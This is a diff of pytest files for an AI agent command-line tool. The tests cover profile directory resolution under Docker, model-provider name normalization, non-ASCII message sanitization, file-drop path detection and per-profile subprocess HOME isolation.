monkeypatch.setenv("HERMES_HOME", str(tmp_path / ".hermes"))
result = gateway_cli._profile_arg(str(profile_dir))
assert result == "--profile mybot"
@@ -771,6 +773,7 @@ class TestProfileArg:
custom_home = tmp_path / "custom" / "hermes"
custom_home.mkdir(parents=True)
monkeypatch.setattr(Path, "home", lambda: tmp_path)
monkeypatch.setenv("HERMES_HOME", str(tmp_path / ".hermes"))
result = gateway_cli._profile_arg(str(custom_home))
assert result == ""
@@ -779,6 +782,7 @@ class TestProfileArg:
nested = tmp_path / ".hermes" / "profiles" / "mybot" / "subdir"
nested.mkdir(parents=True)
monkeypatch.setattr(Path, "home", lambda: tmp_path)
monkeypatch.setenv("HERMES_HOME", str(tmp_path / ".hermes"))
result = gateway_cli._profile_arg(str(nested))
assert result == ""
@@ -787,6 +791,7 @@ class TestProfileArg:
bad_profile = tmp_path / ".hermes" / "profiles" / "My Bot!"
bad_profile.mkdir(parents=True)
monkeypatch.setattr(Path, "home", lambda: tmp_path)
monkeypatch.setenv("HERMES_HOME", str(tmp_path / ".hermes"))
result = gateway_cli._profile_arg(str(bad_profile))
assert result == ""
+15
View File
@@ -102,6 +102,21 @@ class TestAggregatorProviders:
assert result == "anthropic/claude-sonnet-4.6"
class TestIssue6211NativeProviderPrefixNormalization:
@pytest.mark.parametrize("model,target_provider,expected", [
("zai/glm-5.1", "zai", "glm-5.1"),
("google/gemini-2.5-pro", "gemini", "google/gemini-2.5-pro"),
("moonshot/kimi-k2.5", "kimi-coding", "kimi-k2.5"),
("anthropic/claude-sonnet-4.6", "openrouter", "anthropic/claude-sonnet-4.6"),
("Qwen/Qwen3.5-397B-A17B", "huggingface", "Qwen/Qwen3.5-397B-A17B"),
("modal/zai-org/GLM-5-FP8", "custom", "modal/zai-org/GLM-5-FP8"),
])
def test_native_provider_prefixes_are_only_stripped_on_matching_provider(
self, model, target_provider, expected
):
assert normalize_model_for_provider(model, target_provider) == expected
# ── detect_vendor ──────────────────────────────────────────────────────
class TestDetectVendor:
@@ -0,0 +1,33 @@
"""Test that opencode-go appears in /model list when credentials are set."""
import os
from unittest.mock import patch
from hermes_cli.model_switch import list_authenticated_providers
@patch.dict(os.environ, {"OPENCODE_GO_API_KEY": "test-key"}, clear=False)
def test_opencode_go_appears_when_api_key_set():
"""opencode-go should appear in list_authenticated_providers when OPENCODE_GO_API_KEY is set."""
providers = list_authenticated_providers(current_provider="openrouter")
# Find opencode-go in results
opencode_go = next((p for p in providers if p["slug"] == "opencode-go"), None)
assert opencode_go is not None, "opencode-go should appear when OPENCODE_GO_API_KEY is set"
assert opencode_go["models"] == ["glm-5", "kimi-k2.5", "mimo-v2-pro", "mimo-v2-omni", "minimax-m2.7", "minimax-m2.5"]
# opencode-go is in PROVIDER_TO_MODELS_DEV, so it appears as "built-in" (Part 1)
assert opencode_go["source"] == "built-in"
def test_opencode_go_not_appears_when_no_creds():
"""opencode-go should NOT appear when no credentials are set."""
# Ensure OPENCODE_GO_API_KEY is not set
env_without_key = {k: v for k, v in os.environ.items() if k != "OPENCODE_GO_API_KEY"}
with patch.dict(os.environ, env_without_key, clear=True):
providers = list_authenticated_providers(current_provider="openrouter")
# opencode-go should not be in results
opencode_go = next((p for p in providers if p["slug"] == "opencode-go"), None)
assert opencode_go is None, "opencode-go should not appear without credentials"
@@ -0,0 +1,83 @@
"""Test that overlay providers with mismatched models.dev keys resolve correctly.
HERMES_OVERLAYS keys may be models.dev IDs (e.g. "github-copilot") while
_PROVIDER_MODELS and config.yaml use Hermes IDs ("copilot"). The slug
resolution in list_authenticated_providers() Section 2 must bridge this gap.
Covers: #5223, #6492
"""
import json
import os
from unittest.mock import patch
import pytest
from hermes_cli.model_switch import list_authenticated_providers
# -- Copilot slug resolution (env var path) ----------------------------------
@patch.dict(os.environ, {"COPILOT_GITHUB_TOKEN": "fake-ghu"}, clear=False)
def test_copilot_uses_hermes_slug():
"""github-copilot overlay should resolve to slug='copilot' with curated models."""
providers = list_authenticated_providers(current_provider="copilot")
copilot = next((p for p in providers if p["slug"] == "copilot"), None)
assert copilot is not None, "copilot should appear when COPILOT_GITHUB_TOKEN is set"
assert copilot["total_models"] > 0, "copilot should have curated models"
assert copilot["is_current"] is True
# Must NOT appear under the models.dev key
gh_copilot = next((p for p in providers if p["slug"] == "github-copilot"), None)
assert gh_copilot is None, "github-copilot slug should not appear (resolved to copilot)"
@patch.dict(os.environ, {"COPILOT_GITHUB_TOKEN": "fake-ghu"}, clear=False)
def test_copilot_no_duplicate_entries():
"""Copilot must appear only once — not as both 'copilot' (section 1) and 'github-copilot' (section 2)."""
providers = list_authenticated_providers(current_provider="copilot")
copilot_slugs = [p["slug"] for p in providers if "copilot" in p["slug"]]
# Should have at most one copilot entry (may also have copilot-acp if creds exist)
copilot_main = [s for s in copilot_slugs if s == "copilot"]
assert len(copilot_main) == 1, f"Expected exactly one 'copilot' entry, got {copilot_main}"
# -- kimi-for-coding alias in auth.py ----------------------------------------
def test_kimi_for_coding_alias():
"""resolve_provider('kimi-for-coding') should return 'kimi-coding'."""
from hermes_cli.auth import resolve_provider
result = resolve_provider("kimi-for-coding")
assert result == "kimi-coding"
# -- Generic slug mismatch providers -----------------------------------------
@patch.dict(os.environ, {"KIMI_API_KEY": "fake-key"}, clear=False)
def test_kimi_for_coding_overlay_uses_hermes_slug():
"""kimi-for-coding overlay should resolve to slug='kimi-coding'."""
providers = list_authenticated_providers(current_provider="kimi-coding")
kimi = next((p for p in providers if p["slug"] == "kimi-coding"), None)
assert kimi is not None, "kimi-coding should appear when KIMI_API_KEY is set"
assert kimi["is_current"] is True
# Must NOT appear under the models.dev key
kimi_mdev = next((p for p in providers if p["slug"] == "kimi-for-coding"), None)
assert kimi_mdev is None, "kimi-for-coding slug should not appear (resolved to kimi-coding)"
@patch.dict(os.environ, {"KILOCODE_API_KEY": "fake-key"}, clear=False)
def test_kilo_overlay_uses_hermes_slug():
"""kilo overlay should resolve to slug='kilocode'."""
providers = list_authenticated_providers(current_provider="kilocode")
kilo = next((p for p in providers if p["slug"] == "kilocode"), None)
assert kilo is not None, "kilocode should appear when KILOCODE_API_KEY is set"
assert kilo["is_current"] is True
kilo_mdev = next((p for p in providers if p["slug"] == "kilo"), None)
assert kilo_mdev is None, "kilo slug should not appear (resolved to kilocode)"
+72 -2
View File
@@ -293,12 +293,16 @@ class TestGetActiveProfileName:
monkeypatch.setenv("HERMES_HOME", str(profile_dir))
assert get_active_profile_name() == "coder"
def test_custom_path_returns_custom(self, profile_env, monkeypatch):
def test_custom_path_returns_default(self, profile_env, monkeypatch):
"""A custom HERMES_HOME (Docker, etc.) IS the default root."""
tmp_path = profile_env
custom = tmp_path / "some" / "other" / "path"
custom.mkdir(parents=True)
monkeypatch.setenv("HERMES_HOME", str(custom))
assert get_active_profile_name() == "custom"
# With Docker-aware roots, a custom HERMES_HOME is the default —
# not "custom". The user is on the default profile of their
# custom deployment.
assert get_active_profile_name() == "default"
# ===================================================================
@@ -706,6 +710,72 @@ class TestInternalHelpers:
home = _get_default_hermes_home()
assert home == tmp_path / ".hermes"
def test_profiles_root_docker_deployment(self, tmp_path, monkeypatch):
"""In Docker (HERMES_HOME outside ~/.hermes), profiles go under HERMES_HOME."""
docker_home = tmp_path / "opt" / "data"
docker_home.mkdir(parents=True)
monkeypatch.setattr(Path, "home", lambda: tmp_path)
monkeypatch.setenv("HERMES_HOME", str(docker_home))
root = _get_profiles_root()
assert root == docker_home / "profiles"
def test_default_hermes_home_docker(self, tmp_path, monkeypatch):
"""In Docker, _get_default_hermes_home() returns HERMES_HOME itself."""
docker_home = tmp_path / "opt" / "data"
docker_home.mkdir(parents=True)
monkeypatch.setattr(Path, "home", lambda: tmp_path)
monkeypatch.setenv("HERMES_HOME", str(docker_home))
home = _get_default_hermes_home()
assert home == docker_home
def test_profiles_root_profile_mode(self, tmp_path, monkeypatch):
"""In profile mode (HERMES_HOME under ~/.hermes), profiles root is still ~/.hermes/profiles."""
native = tmp_path / ".hermes"
profile_dir = native / "profiles" / "coder"
profile_dir.mkdir(parents=True)
monkeypatch.setattr(Path, "home", lambda: tmp_path)
monkeypatch.setenv("HERMES_HOME", str(profile_dir))
root = _get_profiles_root()
assert root == native / "profiles"
def test_active_profile_path_docker(self, tmp_path, monkeypatch):
"""In Docker, active_profile file lives under HERMES_HOME."""
from hermes_cli.profiles import _get_active_profile_path
docker_home = tmp_path / "opt" / "data"
docker_home.mkdir(parents=True)
monkeypatch.setattr(Path, "home", lambda: tmp_path)
monkeypatch.setenv("HERMES_HOME", str(docker_home))
path = _get_active_profile_path()
assert path == docker_home / "active_profile"
def test_create_profile_docker(self, tmp_path, monkeypatch):
"""Profile created in Docker lands under HERMES_HOME/profiles/."""
docker_home = tmp_path / "opt" / "data"
docker_home.mkdir(parents=True)
monkeypatch.setattr(Path, "home", lambda: tmp_path)
monkeypatch.setenv("HERMES_HOME", str(docker_home))
result = create_profile("orchestrator", no_alias=True)
expected = docker_home / "profiles" / "orchestrator"
assert result == expected
assert expected.is_dir()
def test_active_profile_name_docker_default(self, tmp_path, monkeypatch):
"""In Docker (no profile active), get_active_profile_name() returns 'default'."""
docker_home = tmp_path / "opt" / "data"
docker_home.mkdir(parents=True)
monkeypatch.setattr(Path, "home", lambda: tmp_path)
monkeypatch.setenv("HERMES_HOME", str(docker_home))
assert get_active_profile_name() == "default"
def test_active_profile_name_docker_profile(self, tmp_path, monkeypatch):
"""In Docker with a profile active, get_active_profile_name() returns the profile name."""
docker_home = tmp_path / "opt" / "data"
profile = docker_home / "profiles" / "orchestrator"
profile.mkdir(parents=True)
monkeypatch.setattr(Path, "home", lambda: tmp_path)
monkeypatch.setenv("HERMES_HOME", str(profile))
assert get_active_profile_name() == "orchestrator"
# ===================================================================
# Edge cases and additional coverage
+5 -2
View File
@@ -1,6 +1,7 @@
"""Tests for the update check mechanism in hermes_cli.banner."""
import json
import os
import threading
import time
from pathlib import Path
@@ -144,7 +145,8 @@ def test_invalidate_update_cache_clears_all_profiles(tmp_path):
p.mkdir(parents=True)
(p / ".update_check").write_text('{"ts":1,"behind":50}')
with patch.object(Path, "home", return_value=tmp_path):
with patch.object(Path, "home", return_value=tmp_path), \
patch.dict(os.environ, {"HERMES_HOME": str(default_home)}):
_invalidate_update_cache()
# All three caches should be gone
@@ -161,7 +163,8 @@ def test_invalidate_update_cache_no_profiles_dir(tmp_path):
default_home.mkdir()
(default_home / ".update_check").write_text('{"ts":1,"behind":5}')
with patch.object(Path, "home", return_value=tmp_path):
with patch.object(Path, "home", return_value=tmp_path), \
patch.dict(os.environ, {"HERMES_HOME": str(default_home)}):
_invalidate_update_cache()
assert not (default_home / ".update_check").exists()
+3 -1
View File
@@ -9,7 +9,9 @@ Covers three static methods on AIAgent (inspired by PR #1321 — @alireza78a):
import types
from run_agent import AIAgent
from tools.delegate_tool import MAX_CONCURRENT_CHILDREN
from tools.delegate_tool import _get_max_concurrent_children
MAX_CONCURRENT_CHILDREN = _get_max_concurrent_children()
# ---------------------------------------------------------------------------
+19
View File
@@ -113,6 +113,25 @@ class TestTryActivateFallback:
assert agent.provider == "zai"
assert agent.client is mock_client
def test_fallback_uses_resolved_normalized_model(self):
agent = _make_agent(
fallback_model={"provider": "zai", "model": "zai/glm-5.1"},
)
mock_client = _mock_resolve(
api_key="sk-zai-key",
base_url="https://api.z.ai/api/paas/v4",
)
with patch(
"agent.auxiliary_client.resolve_provider_client",
return_value=(mock_client, "glm-5.1"),
):
result = agent._try_activate_fallback()
assert result is True
assert agent.model == "glm-5.1"
assert agent.provider == "zai"
assert agent.client is mock_client
def test_activates_kimi_fallback(self):
agent = _make_agent(
fallback_model={"provider": "kimi-coding", "model": "kimi-k2.5"},
+42
View File
@@ -138,6 +138,48 @@ def test_aiagent_reuses_existing_errors_log_handler():
root_logger.addHandler(handler)
class TestProviderModelNormalization:
def test_aiagent_strips_matching_native_provider_prefix(self):
with (
patch(
"run_agent.get_tool_definitions", return_value=_make_tool_defs("web_search")
),
patch("run_agent.check_toolset_requirements", return_value={}),
patch("run_agent.OpenAI"),
):
agent = AIAgent(
model="zai/glm-5.1",
provider="zai",
base_url="https://api.z.ai/api/paas/v4",
api_key="test-key-1234567890",
quiet_mode=True,
skip_context_files=True,
skip_memory=True,
)
assert agent.model == "glm-5.1"
def test_aiagent_keeps_aggregator_vendor_slug(self):
with (
patch(
"run_agent.get_tool_definitions", return_value=_make_tool_defs("web_search")
),
patch("run_agent.check_toolset_requirements", return_value={}),
patch("run_agent.OpenAI"),
):
agent = AIAgent(
model="anthropic/claude-sonnet-4.6",
provider="openrouter",
base_url="https://openrouter.ai/api/v1",
api_key="test-key-1234567890",
quiet_mode=True,
skip_context_files=True,
skip_memory=True,
)
assert agent.model == "anthropic/claude-sonnet-4.6"
# ---------------------------------------------------------------------------
# Helper to build mock assistant messages (API response objects)
# ---------------------------------------------------------------------------
@@ -0,0 +1,74 @@
"""Tests that switch_model preserves config_context_length."""
from unittest.mock import MagicMock, patch
from run_agent import AIAgent
from agent.context_compressor import ContextCompressor
def _make_agent_with_compressor(config_context_length=None) -> AIAgent:
"""Build a minimal AIAgent with a context_compressor, skipping __init__."""
agent = AIAgent.__new__(AIAgent)
# Primary model settings
agent.model = "primary-model"
agent.provider = "openrouter"
agent.base_url = "https://openrouter.ai/api/v1"
agent.api_key = "sk-primary"
agent.api_mode = "chat_completions"
agent.client = MagicMock()
agent.quiet_mode = True
# Store config_context_length for later use in switch_model
agent._config_context_length = config_context_length
# Context compressor with primary model values
compressor = ContextCompressor(
model="primary-model",
threshold_percent=0.50,
base_url="https://openrouter.ai/api/v1",
api_key="sk-primary",
provider="openrouter",
quiet_mode=True,
config_context_length=config_context_length,
)
agent.context_compressor = compressor
# For switch_model
agent._primary_runtime = {}
return agent
@patch("agent.model_metadata.get_model_context_length", return_value=131_072)
def test_switch_model_preserves_config_context_length(mock_ctx_len):
"""When switching models, config_context_length should be passed to get_model_context_length."""
agent = _make_agent_with_compressor(config_context_length=32_768)
assert agent.context_compressor.model == "primary-model"
assert agent.context_compressor.context_length == 32_768 # From config override
# Switch model
agent.switch_model("new-model", "openrouter", api_key="sk-new", base_url="https://openrouter.ai/api/v1")
# Verify get_model_context_length was called with config_context_length
mock_ctx_len.assert_called_once()
call_kwargs = mock_ctx_len.call_args.kwargs
assert call_kwargs.get("config_context_length") == 32_768
# Verify compressor was updated
assert agent.context_compressor.model == "new-model"
def test_switch_model_without_config_context_length():
"""When switching models without config override, config_context_length should be None."""
agent = _make_agent_with_compressor(config_context_length=None)
with patch("agent.model_metadata.get_model_context_length", return_value=128_000) as mock_ctx_len:
# Switch model
agent.switch_model("new-model", "openrouter", api_key="sk-new", base_url="https://openrouter.ai/api/v1")
# Verify get_model_context_length was called with None
mock_ctx_len.assert_called_once()
call_kwargs = mock_ctx_len.call_args.kwargs
assert call_kwargs.get("config_context_length") is None
+140
View File
@@ -0,0 +1,140 @@
"""Tests for UnicodeEncodeError recovery with ASCII codec.
Covers the fix for issue #6843 — systems with ASCII locale (LANG=C)
that can't encode non-ASCII characters in API request payloads.
"""
import pytest
from run_agent import (
_strip_non_ascii,
_sanitize_messages_non_ascii,
_sanitize_messages_surrogates,
)
class TestStripNonAscii:
"""Tests for _strip_non_ascii helper."""
def test_ascii_only(self):
assert _strip_non_ascii("hello world") == "hello world"
def test_removes_non_ascii(self):
assert _strip_non_ascii("hello ⚕ world") == "hello world"
def test_removes_emoji(self):
assert _strip_non_ascii("test 🤖 done") == "test done"
def test_chinese_chars(self):
assert _strip_non_ascii("你好world") == "world"
def test_empty_string(self):
assert _strip_non_ascii("") == ""
def test_only_non_ascii(self):
assert _strip_non_ascii("⚕🤖") == ""
class TestSanitizeMessagesNonAscii:
"""Tests for _sanitize_messages_non_ascii."""
def test_no_change_ascii_only(self):
messages = [{"role": "user", "content": "hello"}]
assert _sanitize_messages_non_ascii(messages) is False
assert messages[0]["content"] == "hello"
def test_sanitizes_content_string(self):
messages = [{"role": "user", "content": "hello ⚕ world"}]
assert _sanitize_messages_non_ascii(messages) is True
assert messages[0]["content"] == "hello world"
def test_sanitizes_content_list(self):
messages = [{
"role": "user",
"content": [{"type": "text", "text": "hello 🤖"}]
}]
assert _sanitize_messages_non_ascii(messages) is True
assert messages[0]["content"][0]["text"] == "hello "
def test_sanitizes_name_field(self):
messages = [{"role": "tool", "name": "⚕tool", "content": "ok"}]
assert _sanitize_messages_non_ascii(messages) is True
assert messages[0]["name"] == "tool"
def test_sanitizes_tool_calls(self):
messages = [{
"role": "assistant",
"content": None,
"tool_calls": [{
"id": "call_1",
"type": "function",
"function": {
"name": "read_file",
"arguments": '{"path": "⚕test.txt"}'
}
}]
}]
assert _sanitize_messages_non_ascii(messages) is True
assert messages[0]["tool_calls"][0]["function"]["arguments"] == '{"path": "test.txt"}'
def test_handles_non_dict_messages(self):
messages = ["not a dict", {"role": "user", "content": "hello"}]
assert _sanitize_messages_non_ascii(messages) is False
def test_empty_messages(self):
assert _sanitize_messages_non_ascii([]) is False
def test_multiple_messages(self):
messages = [
{"role": "system", "content": "⚕ System prompt"},
{"role": "user", "content": "Hello 你好"},
{"role": "assistant", "content": "Hi there!"},
]
assert _sanitize_messages_non_ascii(messages) is True
assert messages[0]["content"] == " System prompt"
assert messages[1]["content"] == "Hello "
assert messages[2]["content"] == "Hi there!"
class TestSurrogateVsAsciiSanitization:
"""Test that surrogate and ASCII sanitization work independently."""
def test_surrogates_still_handled(self):
"""Surrogates are caught by _sanitize_messages_surrogates, not _non_ascii."""
msg_with_surrogate = "test \ud800 end"
messages = [{"role": "user", "content": msg_with_surrogate}]
assert _sanitize_messages_surrogates(messages) is True
assert "\ud800" not in messages[0]["content"]
assert "\ufffd" in messages[0]["content"]
def test_surrogates_in_name_and_tool_calls_are_sanitized(self):
messages = [{
"role": "assistant",
"name": "bad\ud800name",
"content": None,
"tool_calls": [{
"id": "call_\ud800",
"type": "function",
"function": {
"name": "read\ud800_file",
"arguments": '{"path": "bad\ud800.txt"}'
}
}],
}]
assert _sanitize_messages_surrogates(messages) is True
assert "\ud800" not in messages[0]["name"]
assert "\ud800" not in messages[0]["tool_calls"][0]["id"]
assert "\ud800" not in messages[0]["tool_calls"][0]["function"]["name"]
assert "\ud800" not in messages[0]["tool_calls"][0]["function"]["arguments"]
def test_ascii_codec_strips_all_non_ascii(self):
"""ASCII codec case: all non-ASCII is stripped, not replaced."""
messages = [{"role": "user", "content": "test ⚕🤖你好 end"}]
assert _sanitize_messages_non_ascii(messages) is True
# All non-ASCII chars removed; spaces around them collapse
assert messages[0]["content"] == "test end"
def test_no_surrogates_returns_false(self):
"""When no surrogates present, _sanitize_messages_surrogates returns False."""
messages = [{"role": "user", "content": "hello ⚕ world"}]
assert _sanitize_messages_surrogates(messages) is False
+176
View File
@@ -0,0 +1,176 @@
"""Tests for _detect_file_drop — file path detection that prevents
dragged/pasted absolute paths from being mistaken for slash commands."""
import os
import tempfile
from pathlib import Path
import pytest
from cli import _detect_file_drop
# ---------------------------------------------------------------------------
# Fixtures
# ---------------------------------------------------------------------------
@pytest.fixture()
def tmp_image(tmp_path):
"""Create a temporary .png file and return its path."""
img = tmp_path / "screenshot.png"
img.write_bytes(b"\x89PNG\r\n\x1a\n") # minimal PNG header
return img
@pytest.fixture()
def tmp_text(tmp_path):
"""Create a temporary .py file and return its path."""
f = tmp_path / "main.py"
f.write_text("print('hello')\n")
return f
@pytest.fixture()
def tmp_image_with_spaces(tmp_path):
"""Create a file whose name contains spaces (like macOS screenshots)."""
img = tmp_path / "Screenshot 2026-04-01 at 7.25.32 PM.png"
img.write_bytes(b"\x89PNG\r\n\x1a\n")
return img
# ---------------------------------------------------------------------------
# Tests: returns None for non-file inputs
# ---------------------------------------------------------------------------
class TestNonFileInputs:
def test_regular_slash_command(self):
assert _detect_file_drop("/help") is None
def test_unknown_slash_command(self):
assert _detect_file_drop("/xyz") is None
def test_slash_command_with_args(self):
assert _detect_file_drop("/config set key value") is None
def test_empty_string(self):
assert _detect_file_drop("") is None
def test_non_slash_input(self):
assert _detect_file_drop("hello world") is None
def test_non_string_input(self):
assert _detect_file_drop(42) is None
def test_nonexistent_path(self):
assert _detect_file_drop("/nonexistent/path/to/file.png") is None
def test_directory_not_file(self, tmp_path):
"""A directory path should not be treated as a file drop."""
assert _detect_file_drop(str(tmp_path)) is None
# ---------------------------------------------------------------------------
# Tests: image file detection
# ---------------------------------------------------------------------------
class TestImageFileDrop:
def test_simple_image_path(self, tmp_image):
result = _detect_file_drop(str(tmp_image))
assert result is not None
assert result["path"] == tmp_image
assert result["is_image"] is True
assert result["remainder"] == ""
def test_image_with_trailing_text(self, tmp_image):
user_input = f"{tmp_image} analyze this please"
result = _detect_file_drop(user_input)
assert result is not None
assert result["path"] == tmp_image
assert result["is_image"] is True
assert result["remainder"] == "analyze this please"
@pytest.mark.parametrize("ext", [".png", ".jpg", ".jpeg", ".gif", ".webp",
".bmp", ".tiff", ".tif", ".svg", ".ico"])
def test_all_image_extensions(self, tmp_path, ext):
img = tmp_path / f"test{ext}"
img.write_bytes(b"fake")
result = _detect_file_drop(str(img))
assert result is not None
assert result["is_image"] is True
def test_uppercase_extension(self, tmp_path):
img = tmp_path / "photo.JPG"
img.write_bytes(b"fake")
result = _detect_file_drop(str(img))
assert result is not None
assert result["is_image"] is True
# ---------------------------------------------------------------------------
# Tests: non-image file detection
# ---------------------------------------------------------------------------
class TestNonImageFileDrop:
def test_python_file(self, tmp_text):
result = _detect_file_drop(str(tmp_text))
assert result is not None
assert result["path"] == tmp_text
assert result["is_image"] is False
assert result["remainder"] == ""
def test_non_image_with_trailing_text(self, tmp_text):
user_input = f"{tmp_text} review this code"
result = _detect_file_drop(user_input)
assert result is not None
assert result["is_image"] is False
assert result["remainder"] == "review this code"
# ---------------------------------------------------------------------------
# Tests: backslash-escaped spaces (macOS drag-and-drop)
# ---------------------------------------------------------------------------
class TestEscapedSpaces:
def test_escaped_spaces_in_path(self, tmp_image_with_spaces):
r"""macOS drags produce paths like /path/to/my\ file.png"""
escaped = str(tmp_image_with_spaces).replace(' ', '\\ ')
result = _detect_file_drop(escaped)
assert result is not None
assert result["path"] == tmp_image_with_spaces
assert result["is_image"] is True
def test_escaped_spaces_with_trailing_text(self, tmp_image_with_spaces):
escaped = str(tmp_image_with_spaces).replace(' ', '\\ ')
user_input = f"{escaped} what is this?"
result = _detect_file_drop(user_input)
assert result is not None
assert result["path"] == tmp_image_with_spaces
assert result["remainder"] == "what is this?"
# ---------------------------------------------------------------------------
# Tests: edge cases
# ---------------------------------------------------------------------------
class TestEdgeCases:
def test_path_with_no_extension(self, tmp_path):
f = tmp_path / "Makefile"
f.write_text("all:\n\techo hi\n")
result = _detect_file_drop(str(f))
assert result is not None
assert result["is_image"] is False
def test_path_that_looks_like_command_but_is_file(self, tmp_path):
"""A file literally named 'help' inside a directory starting with /."""
f = tmp_path / "help"
f.write_text("not a command\n")
result = _detect_file_drop(str(f))
assert result is not None
assert result["is_image"] is False
def test_symlink_to_file(self, tmp_image, tmp_path):
link = tmp_path / "link.png"
link.symlink_to(tmp_image)
result = _detect_file_drop(str(link))
assert result is not None
assert result["is_image"] is True
+62
View File
@@ -0,0 +1,62 @@
"""Tests for hermes_constants module."""
import os
from pathlib import Path
from unittest.mock import patch
import pytest
from hermes_constants import get_default_hermes_root
class TestGetDefaultHermesRoot:
"""Tests for get_default_hermes_root() — Docker/custom deployment awareness."""
def test_no_hermes_home_returns_native(self, tmp_path, monkeypatch):
"""When HERMES_HOME is not set, returns ~/.hermes."""
monkeypatch.delenv("HERMES_HOME", raising=False)
monkeypatch.setattr(Path, "home", lambda: tmp_path)
assert get_default_hermes_root() == tmp_path / ".hermes"
def test_hermes_home_is_native(self, tmp_path, monkeypatch):
"""When HERMES_HOME = ~/.hermes, returns ~/.hermes."""
native = tmp_path / ".hermes"
native.mkdir()
monkeypatch.setattr(Path, "home", lambda: tmp_path)
monkeypatch.setenv("HERMES_HOME", str(native))
assert get_default_hermes_root() == native
def test_hermes_home_is_profile(self, tmp_path, monkeypatch):
"""When HERMES_HOME is a profile under ~/.hermes, returns ~/.hermes."""
native = tmp_path / ".hermes"
profile = native / "profiles" / "coder"
profile.mkdir(parents=True)
monkeypatch.setattr(Path, "home", lambda: tmp_path)
monkeypatch.setenv("HERMES_HOME", str(profile))
assert get_default_hermes_root() == native
def test_hermes_home_is_docker(self, tmp_path, monkeypatch):
"""When HERMES_HOME points outside ~/.hermes (Docker), returns HERMES_HOME."""
docker_home = tmp_path / "opt" / "data"
docker_home.mkdir(parents=True)
monkeypatch.setattr(Path, "home", lambda: tmp_path)
monkeypatch.setenv("HERMES_HOME", str(docker_home))
assert get_default_hermes_root() == docker_home
def test_hermes_home_is_custom_path(self, tmp_path, monkeypatch):
"""Any HERMES_HOME outside ~/.hermes is treated as the root."""
custom = tmp_path / "my-hermes-data"
custom.mkdir()
monkeypatch.setattr(Path, "home", lambda: tmp_path)
monkeypatch.setenv("HERMES_HOME", str(custom))
assert get_default_hermes_root() == custom
def test_docker_profile_active(self, tmp_path, monkeypatch):
"""When a Docker profile is active (HERMES_HOME=<root>/profiles/<name>),
returns the Docker root, not the profile dir."""
docker_root = tmp_path / "opt" / "data"
profile = docker_root / "profiles" / "coder"
profile.mkdir(parents=True)
monkeypatch.setattr(Path, "home", lambda: tmp_path)
monkeypatch.setenv("HERMES_HOME", str(profile))
assert get_default_hermes_root() == docker_root
+198
View File
@@ -0,0 +1,198 @@
"""Tests for per-profile subprocess HOME isolation (#4426).
Verifies that subprocesses (terminal, execute_code, background processes)
receive a per-profile HOME directory while the Python process's own HOME
and Path.home() remain unchanged.
See: https://github.com/NousResearch/hermes-agent/issues/4426
"""
import os
from pathlib import Path
from unittest.mock import patch
import pytest
# ---------------------------------------------------------------------------
# get_subprocess_home()
# ---------------------------------------------------------------------------
class TestGetSubprocessHome:
"""Unit tests for hermes_constants.get_subprocess_home()."""
def test_returns_none_when_hermes_home_unset(self, monkeypatch):
monkeypatch.delenv("HERMES_HOME", raising=False)
from hermes_constants import get_subprocess_home
assert get_subprocess_home() is None
def test_returns_none_when_home_dir_missing(self, tmp_path, monkeypatch):
hermes_home = tmp_path / ".hermes"
hermes_home.mkdir()
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
# No home/ subdirectory created
from hermes_constants import get_subprocess_home
assert get_subprocess_home() is None
def test_returns_path_when_home_dir_exists(self, tmp_path, monkeypatch):
hermes_home = tmp_path / ".hermes"
hermes_home.mkdir()
profile_home = hermes_home / "home"
profile_home.mkdir()
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
from hermes_constants import get_subprocess_home
assert get_subprocess_home() == str(profile_home)
def test_returns_profile_specific_path(self, tmp_path, monkeypatch):
"""Named profiles get their own isolated HOME."""
profile_dir = tmp_path / ".hermes" / "profiles" / "coder"
profile_dir.mkdir(parents=True)
profile_home = profile_dir / "home"
profile_home.mkdir()
monkeypatch.setenv("HERMES_HOME", str(profile_dir))
from hermes_constants import get_subprocess_home
assert get_subprocess_home() == str(profile_home)
def test_two_profiles_get_different_homes(self, tmp_path, monkeypatch):
base = tmp_path / ".hermes" / "profiles"
for name in ("alpha", "beta"):
p = base / name
p.mkdir(parents=True)
(p / "home").mkdir()
from hermes_constants import get_subprocess_home
monkeypatch.setenv("HERMES_HOME", str(base / "alpha"))
home_a = get_subprocess_home()
monkeypatch.setenv("HERMES_HOME", str(base / "beta"))
home_b = get_subprocess_home()
assert home_a != home_b
assert home_a.endswith("alpha/home")
assert home_b.endswith("beta/home")
# ---------------------------------------------------------------------------
# _make_run_env() injection
# ---------------------------------------------------------------------------
class TestMakeRunEnvHomeInjection:
"""Verify _make_run_env() injects HOME into subprocess envs."""
def test_injects_home_when_profile_home_exists(self, tmp_path, monkeypatch):
hermes_home = tmp_path / "hermes"
hermes_home.mkdir()
(hermes_home / "home").mkdir()
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
monkeypatch.setenv("HOME", "/root")
monkeypatch.setenv("PATH", "/usr/bin:/bin")
from tools.environments.local import _make_run_env
result = _make_run_env({})
assert result["HOME"] == str(hermes_home / "home")
def test_no_injection_when_home_dir_missing(self, tmp_path, monkeypatch):
hermes_home = tmp_path / "hermes"
hermes_home.mkdir()
# No home/ subdirectory
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
monkeypatch.setenv("HOME", "/root")
monkeypatch.setenv("PATH", "/usr/bin:/bin")
from tools.environments.local import _make_run_env
result = _make_run_env({})
assert result["HOME"] == "/root"
def test_no_injection_when_hermes_home_unset(self, monkeypatch):
monkeypatch.delenv("HERMES_HOME", raising=False)
monkeypatch.setenv("HOME", "/home/user")
monkeypatch.setenv("PATH", "/usr/bin:/bin")
from tools.environments.local import _make_run_env
result = _make_run_env({})
assert result["HOME"] == "/home/user"
# ---------------------------------------------------------------------------
# _sanitize_subprocess_env() injection
# ---------------------------------------------------------------------------
class TestSanitizeSubprocessEnvHomeInjection:
"""Verify _sanitize_subprocess_env() injects HOME for background procs."""
def test_injects_home_when_profile_home_exists(self, tmp_path, monkeypatch):
hermes_home = tmp_path / "hermes"
hermes_home.mkdir()
(hermes_home / "home").mkdir()
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
base_env = {"HOME": "/root", "PATH": "/usr/bin", "USER": "root"}
from tools.environments.local import _sanitize_subprocess_env
result = _sanitize_subprocess_env(base_env)
assert result["HOME"] == str(hermes_home / "home")
def test_no_injection_when_home_dir_missing(self, tmp_path, monkeypatch):
hermes_home = tmp_path / "hermes"
hermes_home.mkdir()
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
